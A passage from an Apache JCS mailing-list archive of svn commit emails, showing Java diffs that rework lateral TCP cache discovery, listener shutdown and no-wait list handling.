service.addParticipatingCacheName( "testCache1" ); MockDiscoveryListener discoveryListener = new MockDiscoveryListener(); - service.setDiscoveryListener( discoveryListener ); + service.addDiscoveryListener( discoveryListener ); DiscoveredService discoveredService = new DiscoveredService(); discoveredService.setServiceAddress( host ); Modified: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java?rev=796476&r1=796475&r2=796476&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java Tue Jul 21 19:00:11 2009 @@ -49,7 +49,7 @@ service.addParticipatingCacheName( "testCache1" ); MockDiscoveryListener discoveryListener = new MockDiscoveryListener(); - service.setDiscoveryListener( discoveryListener ); + service.addDiscoveryListener( discoveryListener ); // create a receiver with the service UDPDiscoveryReceiver receiver = new UDPDiscoveryReceiver( service, attributes.getUdpDiscoveryAddr(), attributes --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 22 21:13:05 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45333 invoked from network); 22 Jul 2009 21:13:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jul 2009 21:13:05 -0000 Received: (qmail 86462 invoked by uid 500); 22 Jul 2009 21:14:10 -0000 Delivered-To: [email protected] Received: (qmail 86432 invoked by uid 500); 22 Jul 2009 21:14:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 86422 invoked by uid 500); 22 Jul 2009 21:14:10 -0000 Delivered-To: [email protected] Received: (qmail 86419 invoked by uid 500); 22 Jul 2009 21:14:10 -0000 Delivered-To: [email protected] Received: (qmail 86416 invoked by uid 99); 22 Jul 2009 21:14:10 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Jul 2009 21:14:10 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Jul 2009 21:14:00 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E894C2388893; Wed, 22 Jul 2009 21:13:39 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r796882 - in /jakarta/jcs/trunk/src: conf/ java/org/apache/jcs/auxiliary/lateral/ java/org/apache/jcs/auxiliary/lateral/socket/tcp/ java/org/apache/jcs/utils/discovery/ test/org/apache/jcs/auxiliary/lateral/ Date: Wed, 22 Jul 2009 21:13:39 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Wed Jul 22 21:13:38 2009 New Revision: 796882 URL: http://svn.apache.org/viewvc?rev=796882&view=rev Log: Improving lateral TCP discovery. Added: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacadeUnitTest.java Modified: jakarta/jcs/trunk/src/conf/cacheTCP2.ccf jakarta/jcs/trunk/src/conf/cacheTCP3.ccf jakarta/jcs/trunk/src/conf/cacheTCP4.ccf jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAbstractManager.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPListener.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java Modified: jakarta/jcs/trunk/src/conf/cacheTCP2.ccf URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/conf/cacheTCP2.ccf?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== Binary files - no diff available. Modified: jakarta/jcs/trunk/src/conf/cacheTCP3.ccf URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/conf/cacheTCP3.ccf?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== Binary files - no diff available. Modified: jakarta/jcs/trunk/src/conf/cacheTCP4.ccf URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/conf/cacheTCP4.ccf?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== Binary files - no diff available. Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java Wed Jul 22 21:13:38 2009 @@ -111,12 +111,12 @@ catch ( NullPointerException npe ) { log.error( "Failure updating lateral. lateral = " + lateral, npe ); - handleException( npe, "Failed to put [" + ce.getKey() + "] to " + ce.getCacheName() ); + handleException( npe, "Failed to put [" + ce.getKey() + "] to " + ce.getCacheName() + "@" + cattr ); return; } catch ( Exception ex ) { - handleException( ex, "Failed to put [" + ce.getKey() + "] to " + ce.getCacheName() ); + handleException( ex, "Failed to put [" + ce.getKey() + "] to " + ce.getCacheName() + "@" + cattr ); } } @@ -143,7 +143,7 @@ catch ( Exception e ) { log.error( e ); - handleException( e, "Failed to get [" + key + "] from " + this.cattr.getCacheName() ); + handleException( e, "Failed to get [" + key + "] from " + cattr.getCacheName() + "@" + cattr ); } return obj; } @@ -170,7 +170,7 @@ catch ( Exception e ) { log.error( e ); - handleException( e, "Failed to getMatching [" + pattern + "] from " + this.cattr.getCacheName() ); + handleException( e, "Failed to getMatching [" + pattern + "] from " + cattr.getCacheName() + "@" + cattr ); } return elements; } @@ -239,7 +239,7 @@ } catch ( Exception ex ) { - handleException( ex, "Failed to remove " + key + " from " + this.cattr.getCacheName() ); + handleException( ex, "Failed to remove " + key + " from " + cattr.getCacheName() + "@" + cattr ); } return false; } @@ -259,7 +259,7 @@ } catch ( Exception ex ) { - handleException( ex, "Failed to remove all from " + this.cattr.getCacheName() ); + handleException( ex, "Failed to remove all from " + cattr.getCacheName() + "@" + cattr ); } } @@ -285,7 +285,7 @@ catch ( Exception ex ) { log.error( "Couldn't dispose", ex ); - handleException( ex, "Failed to dispose " + this.cattr.getCacheName() ); + handleException( ex, "Failed to dispose " + cattr.getCacheName() ); } } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAbstractManager.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAbstractManager.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAbstractManager.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAbstractManager.java Wed Jul 22 21:13:38 2009 @@ -33,6 +33,7 @@ import org.apache.jcs.auxiliary.lateral.behavior.ILateralCacheObserver; import org.apache.jcs.auxiliary.lateral.behavior.ILateralCacheService; import org.apache.jcs.engine.behavior.IElementSerializer; +import org.apache.jcs.engine.behavior.IShutdownObserver; import org.apache.jcs.engine.logging.behavior.ICacheEventLogger; /** @@ -49,7 +50,7 @@ * Acceptable for all - cache managers or a manager within a type */ public abstract class LateralCacheAbstractManager - implements ILateralCacheManager + implements ILateralCacheManager, IShutdownObserver { /** Don't change */ private static final long serialVersionUID = -515393179178435508L; Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java Wed Jul 22 21:13:38 2009 @@ -420,6 +420,11 @@ se.setData( "" + this.putCount ); elems.add( se ); + se = new StatElement(); + se.setName( "Attributes" ); + se.setData( "" + cache.getAuxiliaryCacheAttributes() ); + elems.add( se ); + // get an array and put them in the Stats object IStatElement[] ses = (IStatElement[]) elems.toArray( new StatElement[elems.size()] ); stats.setStatElements( ses ); Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java Wed Jul 22 21:13:38 2009 @@ -85,10 +85,29 @@ } /** + * Tells you if the no wait is in the list or not. + * <p> + * @param noWait + * @return true if the noWait is in the list. + */ + public boolean containsNoWait( LateralCacheNoWait noWait ) + { + for ( int i = 0; i < noWaits.length; i++ ) + { + // we know noWait isn't null + if ( noWait.equals( noWaits[i] ) ) + { + return true; + } + } + return false; + } + + /** * Adds a no wait to the list if it isn't already in the list. * <p> * @param noWait - * @return true if it wasn't alreay contained + * @return true if it wasn't already contained */ public synchronized boolean addNoWait( LateralCacheNoWait noWait ) { @@ -97,17 +116,13 @@ return false; } - for ( int i = 0; i < noWaits.length; i++ ) + if ( containsNoWait( noWait ) ) { - // we know noWait isn't null - if ( noWait.equals( noWaits[i] ) ) + if ( log.isDebugEnabled() ) { - if ( log.isDebugEnabled() ) - { - log.debug( "No Wait already contained, [" + noWait + "]" ); - } - return false; + log.debug( "No Wait already contained, [" + noWait + "]" ); } + return false; } LateralCacheNoWait[] newArray = new LateralCacheNoWait[noWaits.length + 1]; @@ -142,28 +157,27 @@ if ( noWait.equals( noWaits[i] ) ) { position = i; + break; } } - + if ( position == -1 ) { return false; } - - LateralCacheNoWait[] newArray = new LateralCacheNoWait[noWaits.length -1]; - if ( position > 0 ) + LateralCacheNoWait[] newArray = new LateralCacheNoWait[noWaits.length - 1]; + + System.arraycopy( noWaits, 0, newArray, 0, position ); + if ( noWaits.length != position ) { - System.arraycopy( noWaits, 0, newArray, 0, position -1 ); + System.arraycopy( noWaits, position + 1, newArray, position, noWaits.length - position - 1 ); } - System.arraycopy( noWaits, position +1, newArray, 0, noWaits.length ); - noWaits = newArray; return true; } - /** * @param ce * @throws IOException Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java Wed Jul 22 21:13:38 2009 @@ -32,8 +32,11 @@ import org.apache.jcs.auxiliary.lateral.behavior.ILateralCacheAttributes; import org.apache.jcs.auxiliary.lateral.socket.tcp.behavior.ITCPLateralCacheAttributes; import org.apache.jcs.engine.behavior.ICache; +import org.apache.jcs.engine.behavior.ICacheListener; import org.apache.jcs.engine.behavior.ICompositeCacheManager; import org.apache.jcs.engine.behavior.IElementSerializer; +import org.apache.jcs.engine.behavior.IShutdownObservable; +import org.apache.jcs.engine.behavior.IShutdownObserver; import org.apache.jcs.engine.logging.behavior.ICacheEventLogger; import org.apache.jcs.utils.discovery.UDPDiscoveryManager; import org.apache.jcs.utils.discovery.UDPDiscoveryService; @@ -51,6 +54,9 @@ /** The logger */ private final static Log log = LogFactory.getLog( LateralTCPCacheFactory.class ); + /** Non singleton manager. Used by this instance of the factory. */ + private LateralTCPDiscoveryListenerManager lateralTCPDiscoveryListenerManager; + /** * Creates a TCP lateral. * <p> @@ -66,7 +72,7 @@ ITCPLateralCacheAttributes lac = (ITCPLateralCacheAttributes) iaca; ArrayList noWaits = new ArrayList(); - // pars up the tcp servers and set the tcpServer value and + // pairs up the tcp servers and set the tcpServer value and // get the manager and then get the cache // no servers are required. if ( lac.getTcpServers() != null ) @@ -126,13 +132,19 @@ { if ( log.isInfoEnabled() ) { - log.info( "Creating listener for " + lac ); + log.info( "Getting listener for " + lac ); } try { // make a listener. if one doesn't exist - LateralTCPListener.getInstance( attr, cacheMgr ); + ICacheListener listener = LateralTCPListener.getInstance( attr, cacheMgr ); + + // register for shutdown notification + if ( listener instanceof IShutdownObserver && cacheMgr instanceof IShutdownObservable ) + { + ( (IShutdownObservable) cacheMgr ).registerShutdownObserver( (IShutdownObserver) listener ); + } } catch ( Exception e ) { @@ -158,22 +170,27 @@ * @param elementSerializer * @return null if none is created. */ - private UDPDiscoveryService createDiscoveryService( ITCPLateralCacheAttributes lac, LateralCacheNoWaitFacade lcnwf, - ICompositeCacheManager cacheMgr, - ICacheEventLogger cacheEventLogger, - IElementSerializer elementSerializer ) + private synchronized UDPDiscoveryService createDiscoveryService( ITCPLateralCacheAttributes lac, + LateralCacheNoWaitFacade lcnwf, + ICompositeCacheManager cacheMgr, + ICacheEventLogger cacheEventLogger, + IElementSerializer elementSerializer ) { UDPDiscoveryService discovery = null; // create the UDP discovery for the TCP lateral if ( lac.isUdpDiscoveryEnabled() ) { - // TODO this will create one for each region, but one can be used for all regions - LateralTCPDiscoveryListener discoveryListener = new LateralTCPDiscoveryListener( cacheMgr, - cacheEventLogger, - elementSerializer ); + if ( lateralTCPDiscoveryListenerManager == null ) + { + lateralTCPDiscoveryListenerManager = new LateralTCPDiscoveryListenerManager(); + } + + // One can be used for all regions + LateralTCPDiscoveryListener discoveryListener = lateralTCPDiscoveryListenerManager + .getDiscoveryListener( lac, cacheMgr, cacheEventLogger, elementSerializer ); - discoveryListener.addNoWaitFacade( lcnwf, lac.getCacheName() ); + discoveryListener.addNoWaitFacade( lac.getCacheName(), lcnwf ); // need a factory for this so it doesn't // get dereferenced, also we don't want one for every region. @@ -187,7 +204,7 @@ if ( log.isInfoEnabled() ) { - log.info( "Created UDPDiscoveryService for TCP lateral cache." ); + log.info( "Registered TCP lateral cache [" + lac.getCacheName() + "] with UDPDiscoveryService." ); } } return discovery; Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java Wed Jul 22 21:13:38 2009 @@ -104,18 +104,19 @@ { synchronized ( instances ) { - LateralTCPCacheManager ins = (LateralTCPCacheManager) instances.get( lca.toString() ); + String key = lca.getTcpServer(); + LateralTCPCacheManager ins = (LateralTCPCacheManager) instances.get( key ); if ( ins == null ) { - log.info( "Instance for [" + lca.toString() + "] is null, creating" ); + log.info( "Instance for [" + key + "] is null, creating" ); - ins = (LateralTCPCacheManager) instances.get( lca.toString() ); + ins = (LateralTCPCacheManager) instances.get( lca.getTcpServer() ); if ( ins == null ) { ins = new LateralTCPCacheManager( lca, cacheMgr, cacheEventLogger, elementSerializer ); - instances.put( lca.toString(), ins ); + instances.put( key, ins ); } - + createMonitor( ins ); } ins.clients++; @@ -153,8 +154,8 @@ * <p> * @param lcaA * @param cacheMgr - * @param cacheEventLogger - * @param elementSerializer + * @param cacheEventLogger + * @param elementSerializer */ private LateralTCPCacheManager( ITCPLateralCacheAttributes lcaA, ICompositeCacheManager cacheMgr, ICacheEventLogger cacheEventLogger, IElementSerializer elementSerializer ) @@ -217,7 +218,7 @@ { synchronized ( this.caches ) { - this.lateralWatch.addCacheListener( cacheName, listener ); + lateralWatch.addCacheListener( cacheName, listener ); } } @@ -236,9 +237,9 @@ public AuxiliaryCache getCache( String cacheName ) { LateralCacheNoWait lateralNoWait = null; - synchronized ( this.caches ) + synchronized ( caches ) { - lateralNoWait = (LateralCacheNoWait) this.caches.get( cacheName ); + lateralNoWait = (LateralCacheNoWait) caches.get( cacheName ); if ( lateralNoWait == null ) { LateralCacheAttributes attr = (LateralCacheAttributes) lca.copy(); @@ -257,22 +258,35 @@ lateralNoWait.setCacheEventLogger( cacheEventLogger ); lateralNoWait.setElementSerializer( elementSerializer ); - this.caches.put( cacheName, lateralNoWait ); + caches.put( cacheName, lateralNoWait ); if ( log.isInfoEnabled() ) { - log.info( "Created LateralCacheNoWait for [" + this.lca + "] LateralCacheNoWait = [" - + lateralNoWait + "]" ); + log.info( "Created LateralCacheNoWait for [" + lca + "] LateralCacheNoWait = [" + lateralNoWait + + "]" ); } + + // this used to be called every getCache. i move it in here. + addListenerIfNeeded( cacheName ); } } + return lateralNoWait; + } + + /** + * TODO see if this belongs here or in the factory. + * <p> + * @param cacheName + */ + private void addListenerIfNeeded( String cacheName ) + { // don't create a listener if we are not receiving. if ( lca.isReceive() ) { try { - addLateralCacheListener( cacheName, LateralTCPListener.getInstance( this.lca, cacheMgr ) ); + addLateralCacheListener( cacheName, LateralTCPListener.getInstance( lca, cacheMgr ) ); } catch ( IOException ioe ) { @@ -290,9 +304,6 @@ log.debug( "Not creating a listener since we are not receiving." ); } } - // TODO: need listener repair - - return lateralNoWait; } /** @@ -322,4 +333,21 @@ } return service; } + + /** + * Shutsdown the lateral. + */ + public void shutdown() + { + // TODO revist this. + // the name here doesn't matter. + try + { + lateralService.dispose( "ALL" ); + } + catch ( IOException e ) + { + log.error( "Problem disposing of service", e ); + } + } } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java Wed Jul 22 21:13:38 2009 @@ -1,6 +1,7 @@ package org.apache.jcs.auxiliary.lateral.socket.tcp; import java.util.ArrayList; +import java.util.Collections; import java.util.HashMap; import java.util.Iterator; import java.util.Map; @@ -33,7 +34,7 @@ * Map of no wait facades. these are used to determine which regions are locally configured to * use laterals. */ - private Map facades = new HashMap(); + private Map facades = Collections.synchronizedMap( new HashMap() ); /** The cache manager. */ private ICompositeCacheManager cacheMgr; @@ -65,11 +66,11 @@ * This adds nowaits to a facade for the region name. If the region has no facade, then it is * not configured to use the lateral cache, and no facade will be created. * <p> - * @param facade + * @param facade - facade (for region) => multiple lateral clients. * @param cacheName * @return true if the facade was not already registered. */ - public synchronized boolean addNoWaitFacade( LateralCacheNoWaitFacade facade, String cacheName ) + public synchronized boolean addNoWaitFacade( String cacheName, LateralCacheNoWaitFacade facade ) { boolean isNew = !facades.containsKey( cacheName ); @@ -109,8 +110,8 @@ { if ( log.isInfoEnabled() ) { - log.info( "Different nodes are configured differently. Region [" + noWait.getCacheName() - + "] is not configured to use the lateral cache." ); + log.info( "addNoWait > Different nodes are configured differently or region [" + noWait.getCacheName() + + "] is not yet used on this side. " ); } } } @@ -131,18 +132,18 @@ if ( facade != null ) { - boolean isNew = facade.addNoWait( noWait ); + boolean removed = facade.removeNoWait( noWait ); if ( log.isDebugEnabled() ) { - log.debug( "Called addNoWait, isNew = " + isNew ); + log.debug( "Called removeNoWait, removed " + removed ); } } else { if ( log.isInfoEnabled() ) { - log.info( "Different nodes are configured differently. Region [" + noWait.getCacheName() - + "] is not configured to use the lateral cache." ); + log.info( "removeNoWait > Different nodes are configured differently or region [" + + noWait.getCacheName() + "] is not yet used on this side. " ); } } } @@ -150,6 +151,17 @@ /** * Creates the lateral cache if needed. * <p> + * We could go to the composite cache manager and get the the cache for the region. This would + * force a full configuration of the region. One advantage of this would be that the creation of + * the later would go through the factory, which would add the item to the no wait list. But we + * don't want to do this. This would force this client to have all the regions as the other. + * This might not be desired. We don't want to send or recieve for a region here that is either + * not used or not configured to use the lateral. + * <p> + * Right now, I'm afraid that the region will get puts if another instance has the region + * configured to use the lateral and our address is configured. This might be a bug, but it + * shouldn't happen with discovery. + * <p> * @param service */ public void addDiscoveredService( DiscoveredService service ) @@ -202,6 +214,9 @@ /** * Removes the lateral cache. * <p> + * We need to tell the manager that this instance is bad, so it will reconnect the sender if it + * comes back. + * <p> * @param service */ public void removeDiscoveredService( DiscoveredService service ) Added: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java?rev=796882&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java Wed Jul 22 21:13:38 2009 @@ -0,0 +1,70 @@ +package org.apache.jcs.auxiliary.lateral.socket.tcp; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; + +import org.apache.commons.logging.Log; +import org.apache.commons.logging.LogFactory; +import org.apache.jcs.auxiliary.lateral.socket.tcp.behavior.ITCPLateralCacheAttributes; +import org.apache.jcs.engine.behavior.ICompositeCacheManager; +import org.apache.jcs.engine.behavior.IElementSerializer; +import org.apache.jcs.engine.logging.behavior.ICacheEventLogger; + +/** + * The factory holds an instance of this maanger. This manager has a map of listeners, keyed to the + * discovery configuration. I'm not using a static map, because I'm trying to make JCS + * multi-instance. + * <p> + * During configuration, the factory is only created once per auxiliary definition. Two different + * laterals canot use the same discovery service. We will likey wantt o change this. + */ +public class LateralTCPDiscoveryListenerManager +{ + /** Map of available instances, keyed by port. Note, this is not static. */ + protected Map instances = Collections.synchronizedMap( new HashMap() ); + + /** The logger */ + private final static Log log = LogFactory.getLog( LateralTCPDiscoveryListenerManager.class ); + + /** Does nothing. */ + public LateralTCPDiscoveryListenerManager() + { + if ( log.isInfoEnabled() ) + { + log.info( "Creating new LateralTCPDiscoveryListenerManager" ); + } + } + + /** + * Gets the instance attribute of the LateralCacheTCPListener class. + * <p> + * @param ilca ITCPLateralCacheAttributes + * @param cacheMgr + * @param cacheEventLogger + * @param elementSerializer + * @return The instance value + */ + public synchronized LateralTCPDiscoveryListener getDiscoveryListener( ITCPLateralCacheAttributes ilca, + ICompositeCacheManager cacheMgr, + ICacheEventLogger cacheEventLogger, + IElementSerializer elementSerializer ) + { + String key = ilca.getUdpDiscoveryAddr() + ":" + ilca.getUdpDiscoveryPort(); + LateralTCPDiscoveryListener ins = (LateralTCPDiscoveryListener) instances.get( key ); + + if ( ins == null ) + { + ins = new LateralTCPDiscoveryListener( cacheMgr, cacheEventLogger, elementSerializer ); + + instances.put( String.valueOf( ilca.getTcpListenerPort() ), ins ); + + if ( log.isDebugEnabled() ) + { + log.debug( "created new listener " + ilca.getTcpListenerPort() ); + } + } + + return ins; + } +} Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPListener.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPListener.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPListener.java Wed Jul 22 21:13:38 2009 @@ -37,6 +37,7 @@ import org.apache.jcs.auxiliary.lateral.socket.tcp.behavior.ITCPLateralCacheAttributes; import org.apache.jcs.engine.behavior.ICacheElement; import org.apache.jcs.engine.behavior.ICompositeCacheManager; +import org.apache.jcs.engine.behavior.IShutdownObserver; import org.apache.jcs.engine.control.CompositeCache; import org.apache.jcs.engine.control.CompositeCacheManager; @@ -49,7 +50,7 @@ * passed to a pooled executor which then calls the appropriate handle method. */ public class LateralTCPListener - implements ILateralCacheListener, Serializable + implements ILateralCacheListener, Serializable, IShutdownObserver { /** Don't change. */ private static final long serialVersionUID = -9107062664967131738L; @@ -93,6 +94,9 @@ */ private long listenerId = LateralCacheInfo.listenerId; + /** is this shut down? */ + private boolean shutdown = false; + /** * Gets the instance attribute of the LateralCacheTCPListener class. * <p> @@ -115,9 +119,9 @@ instances.put( String.valueOf( ilca.getTcpListenerPort() ), ins ); - if ( log.isDebugEnabled() ) + if ( log.isInfoEnabled() ) { - log.debug( "created new listener " + ilca.getTcpListenerPort() ); + log.info( "Created new listener " + ilca.getTcpListenerPort() ); } } @@ -322,7 +326,7 @@ return getCache( cacheName ).localGetMatching( pattern ); } - + /** * Right now this does nothing. * <p> @@ -333,12 +337,10 @@ { if ( log.isInfoEnabled() ) { - log.info( "handleDispose > cacheName=" + cacheName ); + log.info( "handleDispose > cacheName=" + cacheName + " | Ignoring message. Do not dispose from remote." ); } // TODO handle active deregistration, rather than passive detection - // through error - // getCacheManager().freeCache( cacheName, true ); } /** @@ -443,7 +445,7 @@ ConnectionHandler handler; - while ( true ) + while ( !shutdown ) { if ( log.isDebugEnabled() ) { @@ -538,11 +540,11 @@ } catch ( java.io.EOFException e ) { - log.info( "Caught java.io.EOFException closing connection." ); + log.info( "Caught java.io.EOFException closing connection." + e.getMessage() ); } catch ( java.net.SocketException e ) { - log.info( "Caught java.net.SocketException closing connection." ); + log.info( "Caught java.net.SocketException closing connection." + e.getMessage() ); } catch ( Exception e ) { @@ -628,7 +630,7 @@ } else if ( led.command == LateralElementDescriptor.GET_MATCHING ) { - Map obj = handleGetMatching( cacheName, (String)key ); + Map obj = handleGetMatching( cacheName, (String) key ); ObjectOutputStream oos = new ObjectOutputStream( socket.getOutputStream() ); @@ -661,4 +663,28 @@ return t; } } + + /** + * Shuts down the receiver. + */ + public void shutdown() + { + if ( !shutdown ) + { + shutdown = true; + + if ( log.isInfoEnabled() ) + { + log.info( "Shutting down TCP Lateral receiver." ); + } + receiver.interrupt(); + } + else + { + if ( log.isDebugEnabled() ) + { + log.debug( "Shutdown already called." ); + } + } + } } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java Wed Jul 22 21:13:38 2009 @@ -94,10 +94,12 @@ attributes.setServicePort( servicePort ); service = new UDPDiscoveryService( attributes, cacheEventLogger ); - - // register for shutdown notification - ( (IShutdownObservable) cacheMgr ).registerShutdownObserver( service ); + // register for shutdown notification + if ( cacheMgr instanceof IShutdownObservable ) + { + ( (IShutdownObservable) cacheMgr ).registerShutdownObserver( service ); + } services.put( key, service ); } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- 